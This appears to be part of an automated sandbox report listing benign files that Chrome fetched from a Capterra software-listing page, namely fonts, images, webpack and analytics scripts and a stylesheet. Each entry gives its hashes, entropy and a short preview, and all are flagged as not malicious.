                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\..........."..........8...............................................................................C.J.F2>..x..M....oy..q/.......H..y..Y.`p..F>.I.>.:..yG...E....R..$.C....Z(..m.Bsb........_.L...;.....L...n.7..?:.>..U.-.....W...=.|y.6.9.M3..D..e......z..d....5...Z7.h.......UF.T.}..R^5s*...{r.Uq...9a....K.[R.=.j..R.5..R4.9)/.:....6......*.j....b.j.................................................. .......U..07PV"1T.............u.02.eX....Q.*G.....`.yf.F..sg..8...;..l.....n..... ..E..Gj.E...u..h,.:g....<...\....(.<.y.Bw...!%..H..U......k.-l.....4ATX.hH..F?5ST;.|#6..W..C?-C....,u.e...U......6..E\....a..".....<.R.;..D*$...U.V.-.o....z^yy.....F#;uZqg..?...\.lA..!.0...\...w.Zv...o.....H......\.....H..#ku[5l9........^Hc>R.@..e..<.z..mA..P.,vZ..>.H...e.0..z.%.H..L...(%..Xu>&.0`.....O./..?S...-.?(|S0..".H q.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 32964, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):32964
                                                                                                                                                                                                        Entropy (8bit):7.993728842119718
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:OwkufdXH7D+Ym5jEeUIR0jsdCjQNlgZU1H34K+oR7ccf3dT6ZGQ6:hkupD+fjEIqYPngZU1H3p+S7lT6U
                                                                                                                                                                                                        MD5:837E4F7F18F25636413ECD6A72074B7C
                                                                                                                                                                                                        SHA1:7F988C4B121F5AFAE056D467C2C9E5D16D4FB844
                                                                                                                                                                                                        SHA-256:001D8A10F7FA65EFB142212DF4F00867320CDA3B9EE9075D7DBE50EF090E14E0
                                                                                                                                                                                                        SHA-512:BC0316DFCA5557518E9AD7B9C5BFC24A06A5CB91E4E7FB1BE45D91C071E419836C5FC9F42109D2931D535B87C55E8A77FC7A3FD9A26FF4B12B6B535B8AC95140
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydLxUd.woff2
                                                                                                                                                                                                        Preview:wOF2...............X...`.............................H.`..D.>........P.....V...@.6.$..(. ..d.....^[..q.m..u'H...'.f.i..r.g...q...1k.....L..nq.J)..B.@.\...f..L...A1.9...R2Uk...!.q.L8...P..~.Q.v.f.xp.Ll...v...).Q..J.F....|.Y.^(F.,.._.8....uT....D.u#.|r..0;.u.&.3&.2.T.$&n]fZCS.8:.-.............c.A.h1{^....{.li%.~`...n.*`.!.....L2.07..F,"...l..+...F.F...J.....qL.b....U....w....YPH..X@b........$..X..&.nzO......k....C....JpVb....H .$.<(.....{.@..RE....B..5.^.B......C.+.>..Y%Y..I.?..{.pgI...4....(m.u.._....._..~..........P.w.........jJg...U.......U....a....... .P.F<..L....v...I.$...K.e...n.tSuB...K.o.JSrU.y..!Sm'.H.t..kU.V.k)M..R.k.9CF.|?q...pU..'.y....MA.s...w+x..._.ow.._.X..'.._q..wa.E!+.Oe......[.'}$Lxvg....J...u5P..L7.)R.R...H...........@.Y.$...Lx1\....d....m&....?...ED.%.._..C......P..d..x~~...l..-.s...W.Y...=..}?...w.#2..f.....z..sx..,..7.........3.%......p..Ts.D..+.v....L.03 ...]......l"... .)'.t...B.6.\.h.....X..,S......./M .at...V......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5142), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5142
                                                                                                                                                                                                        Entropy (8bit):5.465782590927683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ywxCmQoPEBqenzTRVp2mpiK5Vg9EhsdRNVuDcVfSa82oReitfsEnCjQ5:BxN8BNzTXpVsSsdRNJUjRtk8Cs5
                                                                                                                                                                                                        MD5:C620B39B45F4923EFE5DFF2A22EC6658
                                                                                                                                                                                                        SHA1:7CB6EDA5A5284603963974004D5879240B0A8F75
                                                                                                                                                                                                        SHA-256:AD74410B88B0F668BD45B9DE646E6E865E63F6018D0C9D5DFE74A21353417A1C
                                                                                                                                                                                                        SHA-512:9C30E35A907D6B283D6ADC02DCAE070A99075371B024C724EBF00BA2C4CA86B2B1CE12B8D7FD37105F23F173D46C0437793C0B8A90373EB44D3FB433DFB75B46
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/webpack-4e5192402201c54b.js
                                                                                                                                                                                                        Preview:!function(){"use strict";var e,t,r,n,a,o,c,u,i,f={},d={};function l(e){var t=d[e];if(void 0!==t)return t.exports;var r=d[e]={id:e,loaded:!1,exports:{}},n=!0;try{f[e].call(r.exports,r,r.exports,l),n=!1}finally{n&&delete d[e]}return r.loaded=!0,r.exports}l.m=f,e=[],l.O=function(t,r,n,a){if(r){a=a||0;for(var o=e.length;o>0&&e[o-1][2]>a;o--)e[o]=e[o-1];e[o]=[r,n,a];return}for(var c=1/0,o=0;o<e.length;o++){for(var r=e[o][0],n=e[o][1],a=e[o][2],u=!0,i=0;i<r.length;i++)c>=a&&Object.keys(l.O).every(function(e){return l.O[e](r[i])})?r.splice(i--,1):(u=!1,a<c&&(c=a));if(u){e.splice(o--,1);var f=n();void 0!==f&&(t=f)}}return t},l.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return l.d(t,{a:t}),t},r=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},l.t=function(e,n){if(1&n&&(e=this(e)),8&n||"object"==typeof e&&e&&(4&n&&e.__esModule||16&n&&"function"==typeof e.then))return e;var a=Object.create(null);l.r(a);va
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (46278)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):500491
                                                                                                                                                                                                        Entropy (8bit):5.534908236040084
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:OpAZAeAYg5p9E2b21SAdB6bi3ryG6DYj4cMz4aUlEZtNAJ0wLtpO34BmG/:wAZAeAhp9E2brAv6bergVUWGa34Bd
                                                                                                                                                                                                        MD5:C62EAC0CBC559180867050A63D8B78CA
                                                                                                                                                                                                        SHA1:3A77BB4ADD1126FD826A30C40CEDDC03B470AA85
                                                                                                                                                                                                        SHA-256:ED844F94999F5365021A4F70C3CABB95898CF9ACFFEEF6BC15775BFA5E10D64A
                                                                                                                                                                                                        SHA-512:373E0593D34C338BDD843B4AE07EB1C32A24634D129181F40A1654502848D5842E62401BF1BDF90782B767B6E3D41B7A96175D65B0934B4F25167FC4194F465B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"871",. . "macros":[{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"optout_gtmclick_clickout"},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":",C0001,","vtp_name":"OnetrustActiveGroups"},{"function":"__r"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"Capterra"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ppc_monetization_status"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaul
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5329
                                                                                                                                                                                                        Entropy (8bit):7.32078995487548
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jS5N26MT0D5MdtbZPAVwzVJACez26MlnIu373AYwev3VNfYP:+72oYNMtKwXACe3MZIo73AYt/VNfQ
                                                                                                                                                                                                        MD5:024581B0274D30A2CF9625F0E49FAEEC
                                                                                                                                                                                                        SHA1:18B0645E31DC1B584AAF98C4DF119CE39B625949
                                                                                                                                                                                                        SHA-256:FC1706A2410B5A5A71D3FCD475A692D1E9262A6D8ABAD24EF530E90F202196EC
                                                                                                                                                                                                        SHA-512:92AE89077EEC661C6DF324A6D7650ADC481093A242E2BB336522EC89772654E1CABCCA1F24AABAF51D0A82118E4F72A89F6D5D1D5054E706D86BF13C88CE001E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f5157b6b-4b64-4b26-9928-cdc78f98b182.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............V...{.............L...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23865), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23865
                                                                                                                                                                                                        Entropy (8bit):5.17066773670714
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:dEiPYBr8tDTHrmZjlvbbPal9pGh6rk4scHWeqBEcpAODhBwXTzWDg8GUeAwkO06o:OigBgtnQvbbPkGh6Q4scQEcpAODySDig
                                                                                                                                                                                                        MD5:4049F38C00ADD1738DC4806148FF8829
                                                                                                                                                                                                        SHA1:0A631D2CCDE970A13F60E147A5B5AEACB6A1B2E0
                                                                                                                                                                                                        SHA-256:C501DE88FBB90A445F1754A529BC772E7047071BF653C8C3F0330F7BB736D140
                                                                                                                                                                                                        SHA-512:8ADA588F646C3D9456EA5C8F28C994078B6D2F88527E998C3329F53BD915403283F498E31A9532B7488DC23C74F0CB60AFC93F47891D9E73CF6FB96085A97EC1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[11],{"0B8E":function(t,n,e){"use strict";var r=e("rAc1"),u=e("PYcH");function hasOrAdd(t,n,e){var r,c=typeof t;switch(c){case"string":case"number":return 0===t&&1/t===-1/0?!!e._items["-0"]||(n&&(e._items["-0"]=!0),!1):null!==e._nativeSet?n?(r=e._nativeSet.size,e._nativeSet.add(t),e._nativeSet.size===r):e._nativeSet.has(t):c in e._items?t in e._items[c]||(n&&(e._items[c][t]=!0),!1):(n&&(e._items[c]={},e._items[c][t]=!0),!1);case"boolean":if(c in e._items){var a=t?1:0;return!!e._items[c][a]||(n&&(e._items[c][a]=!0),!1)}return n&&(e._items[c]=t?[!1,!0]:[!0,!1]),!1;case"function":return null!==e._nativeSet?n?(r=e._nativeSet.size,e._nativeSet.add(t),e._nativeSet.size===r):e._nativeSet.has(t):c in e._items?!!Object(u.a)(t,e._items[c])||(n&&e._items[c].push(t),!1):(n&&(e._items[c]=[t]),!1);case"undefined":return!!e._items[c]||(n&&(e._items[c]=!0),!1);case"object":if(null===t)return!!e._items.null||(n&&(e._items.null=!0),!1);default:return(c
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (54425), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):54433
                                                                                                                                                                                                        Entropy (8bit):5.318929406464159
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:JCWZDfAxYrIlPxg4ekv/7nyz+b/Lvbqz3pO5o9ueEB9vn:JMx7lPxIk37mobwueEB9vn
                                                                                                                                                                                                        MD5:0DC929FAECE298720A3C1D91FBA63D9E
                                                                                                                                                                                                        SHA1:296D51CB146A8A48F15AD4F77657E1750220B191
                                                                                                                                                                                                        SHA-256:18143B1F4E89703029D8915233C52124D639E229C50BF8E41239BFEF9FF3ECED
                                                                                                                                                                                                        SHA-512:C159BD7201B289BBFC345B1271CD2DDD492E8E114D3D995500319ADE54567B6B7212BEF2339BD37458A9FFE691C6E9D37509585F71EF02988F11963215F349F1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/app/layout-6def20d7f565221b.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3185],{1795:function(e,t,a){Promise.resolve().then(a.bind(a,51246)),Promise.resolve().then(a.bind(a,44498)),Promise.resolve().then(a.bind(a,87520)),Promise.resolve().then(a.bind(a,44314)),Promise.resolve().then(a.bind(a,24491)),Promise.resolve().then(a.bind(a,42424)),Promise.resolve().then(a.t.bind(a,3275,23)),Promise.resolve().then(a.t.bind(a,11311,23)),Promise.resolve().then(a.bind(a,7614)),Promise.resolve().then(a.t.bind(a,25327,23)),Promise.resolve().then(a.t.bind(a,71130,23)),Promise.resolve().then(a.bind(a,34617))},87520:function(e,t,a){"use strict";a.d(t,{default:function(){return s}});var n=a(7653);function r(e,t,a,n){let r=arguments.length>4&&void 0!==arguments[4]&&arguments[4],s=function(e){e.target&&e.target.matches("".concat(a,", ").concat(a," *"))&&n.apply(e.target.closest(a),arguments)};return e.addEventListener(t,s,r),()=>e.removeEventListener(t,s,r)}var s=function(){return(0,n.useEffect)(()=>{let e=function(){let
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1825), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1825
                                                                                                                                                                                                        Entropy (8bit):5.006170819855683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:iKTPJ/sjHX+GSQK0jwNacvD03sizXP0T0ZyQc/0YgBYqlFfY1cMTQQesiaI:Lox0v02Itc/0PlFkcEXexL
                                                                                                                                                                                                        MD5:3BC2F546340FB700AB9A155FF6BF45AB
                                                                                                                                                                                                        SHA1:A0FF1E2FEEE0B1BB7E54A88FD6367BA3E7435AAF
                                                                                                                                                                                                        SHA-256:2F8D2146BBCB6552C686EA04D4BC2BD5791C8D4C796C73D91241B01792620EDA
                                                                                                                                                                                                        SHA-512:487F1F4228DFDF2C247C60BD54CFA69B80CEB3FDBCBF52805CEA0F98773315A383038DCF2376AD4E9D53D72BBFF16146FEB7498E49A98199393A01BA7EE6FA2E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/css/normalize.css
                                                                                                                                                                                                        Preview:article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block;}audio,canvas,video{display:inline-block;}audio:not([controls]){display:none;height:0;}[hidden]{display:none;}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;}body{margin:0;}a:focus{outline:thin dotted;}a:active,a:hover{outline:0;}h1{font-size:2em;margin:0.67em 0;}abbr[title]{border-bottom:1px dotted;}b,strong{font-weight:bold;}dfn{font-style:italic;}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0;}mark{background:#ff0;color:#000;}code,kbd,pre,samp{font-family:monospace,serif;font-size:1em;}pre{white-space:pre-wrap;}q{quotes:"\201C" "\201D" "\2018" "\2019";}small{font-size:80%;}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline;}sup{top:-0.5em;}sub{bottom:-0.25em;}img{border:0;}svg:not(:root){overflow:hidden;}figure{margin:0;}fieldset{border:1px solid #c0c0c0;margin:0 2px;padding:0.35em 0.625em 0.75em;}legend{b
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):164509
                                                                                                                                                                                                        Entropy (8bit):5.302267249020549
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:xPpIomDmDTR50fjZwFMXRH49GT9U3v8TPGFsmV8KJNrVU/kxRfADkVWjem5KOs3C:LamD0Nb49gUE7crRAINF2l
                                                                                                                                                                                                        MD5:18CA8B674B620C8CC2F2CAF733E0BC5C
                                                                                                                                                                                                        SHA1:E837C958713CF2908F4C9C8FCDB3BDF8DE9C2C61
                                                                                                                                                                                                        SHA-256:0022366076896108377AA37F41AC951DBC89670E076BB39CA84544361D908E0C
                                                                                                                                                                                                        SHA-512:9ECBBCF2B263FE8D3E7CB365CC480325C3870BDFEA54730E2AC07271995DE7BA15E1D936588E3A5E69FE135BE045E8D492CCC48D30884CC3D1B3C26C6DE6FA6B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.datadoghq-browser-agent.com/us1/v5/datadog-rum.js
                                                                                                                                                                                                        Preview:!function(){"use strict";var t={log:"log",debug:"debug",info:"info",warn:"warn",error:"error"},e=console,n={};Object.keys(t).forEach((function(t){n[t]=e[t]}));var r="Datadog Browser SDK:",i={debug:n.debug.bind(e,r),log:n.log.bind(e,r),info:n.info.bind(e,r),warn:n.warn.bind(e,r),error:n.error.bind(e,r)},o="https://docs.datadoghq.com",a="".concat(o,"/real_user_monitoring/browser/troubleshooting"),s="More details:";function u(t,e){return function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];try{return t.apply(void 0,n)}catch(t){i.error(e,t)}}}var c,l=function(t,e,n){if(n||2===arguments.length)for(var r,i=0,o=e.length;i<o;i++)!r&&i in e||(r||(r=Array.prototype.slice.call(e,0,i)),r[i]=e[i]);return t.concat(r||Array.prototype.slice.call(e))},d=!1;function f(t){d=t}function p(t){return function(){return v(t,this,arguments)}}function v(t,e,n){try{return t.apply(e,n)}catch(t){if(h(t),c)try{c(t)}catch(t){h(t)}}}function h(){for(var t=[],e=0;e<arguments.length;e++)t[e]=arguments[e]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (5278), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5338
                                                                                                                                                                                                        Entropy (8bit):5.611456827465603
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:SfniKOPeF7YZZM7FBipwwzfjC8qU07qXxSIByojG8JiuK3UoFSYD+ne:jVPLZM7FspnzLpxSpojG8JimoFSYD+e
                                                                                                                                                                                                        MD5:E7CCF56CA886311E14101BA28E200BE5
                                                                                                                                                                                                        SHA1:A95C01B32A0DB56B6DF3DDBEF5A174B43AFC3A2C
                                                                                                                                                                                                        SHA-256:1598513E5AC713E5AD0C1F86F43B15767CCA1EEEF784322739899FFB7670ACA5
                                                                                                                                                                                                        SHA-512:013E8150767C029315F68BC3E4433F2E9AEBE67E7EFAA77A8112D487B6A7BAFC0C768CF7A0B5EE6B09E04BBD836772A21BA86BD5BA71B31EF9A6B29F8E5DAB59
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/5810-8e6ebc81e57df9f9.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5810],{45810:function(n,t){t._getPrivFilters=function(){var n,t=/</g,u=/"/g,r=/'/g,e=/&/g,o=/\x00/g,i=/(?:^$|[\x00\x09-\x0D "'`=<>])/g,a=/[&<>"'`]/g,c=/(?:\x00|^-*!?>|--!?>|--?!?$|\]>|\]$)/g,l=/&(?:#([xX][0-9A-Fa-f]+|\d+);?|(Tab|NewLine|colon|semi|lpar|rpar|apos|sol|comma|excl|ast|midast|ensp|emsp|thinsp);|(nbsp|amp|AMP|lt|LT|gt|GT|quot|QUOT);?)/g,f={Tab:".",NewLine:"\n",colon:":",semi:";",lpar:"(",rpar:")",apos:"'",sol:"/",comma:",",excl:"!",ast:"*",midast:"*",ensp:".",emsp:".",thinsp:".",nbsp:"\xa0",amp:"&",lt:"<",gt:">",quot:'"',QUOT:'"'},y=/^(?:(?!-*expression)#?[-\w]+|[+-]?(?:\d+|\d*\.\d+)(?:r?em|ex|ch|cm|mm|in|px|pt|pc|%|vh|vw|vmin|vmax)?|!important|)$/i,m=/[\x00-\x1F\x7F\[\]{}\\"]/g,d=/[\x00-\x1F\x7F\[\]{}\\']/g,p=/url[\(\u207D\u208D]+/g,s=/['\(\)]/g,g=/\/\/%5[Bb]([A-Fa-f0-9:]+)%5[Dd]/,v={javascript:1,data:1,vbscript:1,mhtml:1,"x-schema":1},I=/(?::|&#[xX]0*3[aA];?|&#0*58;?|&colon;)/,C=/(?:^[\x00-\x20]+|[\t\n\r\x00]+)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):219
                                                                                                                                                                                                        Entropy (8bit):5.2418890428897225
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:XzjbdHhjbzrm6UMPmdXTMXYLqdWzLmr8kdGuLt:fbjmDAmdXTMoLqUnmrnAuLt
                                                                                                                                                                                                        MD5:CD6C396DB0A07FEEC7F35196EC6CE97E
                                                                                                                                                                                                        SHA1:6698D3BD949A5A86DC25755405C7963E30A5528B
                                                                                                                                                                                                        SHA-256:EFCA03EB9332EF82B1A0B2FFB02998DD2ABE2BEF69F4E50BB845683B70470061
                                                                                                                                                                                                        SHA-512:CC1D9030BDCA29563DBBA02B050539B103412A0D108BA55DD31DEF1DED854BB4D766602366DA1C7FC658956B3DD6F31A9104C65FDAE3B0585F5363EB0361E8F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5098],{39595:function(n,e,u){Promise.resolve().then(u.t.bind(u,25327,23))}},function(n){n.O(0,[5327,1293,286,1744],function(){return n(n.s=39595)}),_N_E=n.O()}]);
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                        Entropy (8bit):5.082852501526015
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YUv34GnsMoWJsDWNivdXixXEMGNp0jV291DaeY:YUv3YZWJsDAivJixVG8Q/DaH
                                                                                                                                                                                                        MD5:B3E7599B00B734AF0C60EEA76B30D368
                                                                                                                                                                                                        SHA1:79EEF5DDF3B1E4E3BACA195E3518D456C3001594
                                                                                                                                                                                                        SHA-256:C628B4C3E9AF889520A03118ED0B20304FEB330A1BD4CBBE518CCCDC140357A8
                                                                                                                                                                                                        SHA-512:AAFAC7933F67FE2330127D4C9C9FD00FE65D4D84CBDE4A45C6713B78790A36F3FEDEDA7283004646E8213BF11216E7D6713CBB0A5D4D9656C78CA3FB5416286F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"rules": [{"REPLACE_CONTENT": {"css_selector": "title", "index": 0, "value": [{"type": "TEXT", "content": ""}, {"type": "CURR", "content": "current"}]}}], "variables": [], "url": "www.capterra.com/p/145471/Publicate", "_eid": "2fc7411f-86e8-4b44-9f61-d9ea46bd0fc1"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14567), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14567
                                                                                                                                                                                                        Entropy (8bit):5.57400052980633
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:lLwx/G17xUsFhYXNhEpY4MT+ZgNP8SWu6:l8ML6EXI+ZgNP8Sj6
                                                                                                                                                                                                        MD5:D5B8193E40D3C17F765A377C2724D3A8
                                                                                                                                                                                                        SHA1:E67141DC10B5A2B92EC6841BD0B2EA253D94BF43
                                                                                                                                                                                                        SHA-256:C6A776094257F74C40D605B559E466BAAF8A85F6080A80BAB0C9AC77D30A0829
                                                                                                                                                                                                        SHA-512:1E9505561B651F32C7C2710993A9159F219BFE11CCC09848D805A2FE6BA2C3C0FCF91E36BF80D5A7E449E1B63267F7EA093382147B07339E6BAD8BBB80D97157
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9160],{85001:function(e,t,n){Promise.resolve().then(n.bind(n,56155))},56155:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return u}});var r=n(27573),i=n(34617),o=n(8558),a=n(16311),c=n(65880);function u(){return(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)(o.Z,{useGdmAnalytics:!0}),(0,r.jsx)(i.ScreenContainer,{children:(0,r.jsxs)("div",{"data-testid":"404-page-error",className:"p-xl flex flex-col items-center md:flex-row",children:[(0,r.jsxs)("div",{className:"w-full md:w-7/12",children:[(0,r.jsx)("h1",{className:"mb-xl leading-xl text-xl font-bold md:text-3xl",children:"Page not found"}),(0,r.jsxs)("p",{className:"mb-xl text-lg",children:["Unfortunately, we couldn't find this page. Try checking your URL or return to our ",(0,r.jsx)(i.Link,{href:"".concat(a.nw,"/"),children:"home page"}),"."]}),(0,r.jsx)("p",{className:"font-bold",children:"Here are some other helpful links:"}),(0,r.jsxs)(i.List,{className:"ml-2xl mb
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6086
                                                                                                                                                                                                        Entropy (8bit):7.439190201739567
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7je5N26MT0D5MdtbZPAVwzVJKRdrqRHbx1MP4+eHdyofrOY3Km:+7ioYNMtKwXKRZqRd1MKyM3R
                                                                                                                                                                                                        MD5:5D6DDC7A148B9C7AA672ED060FF34F5A
                                                                                                                                                                                                        SHA1:DE91BC331851A3E9EE8FA7BBCA6516EDFD5C8E63
                                                                                                                                                                                                        SHA-256:2FD7F8F0512E48BED7621AF1373BFF42D6FA364A978BA604F4EDDE58A33B9541
                                                                                                                                                                                                        SHA-512:D3918EB8F8B9E52DBAFB9AA965B8C7BA74EF4D0F27435270C8F56C455B5138DDA3FDDF19FA7E3B3E2E88702BF0EDBAA90A960C187ECF01A5303AC9B40BA3C478
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/82a342f4-1d08-4265-877a-83f0d7b3858f.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...&....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
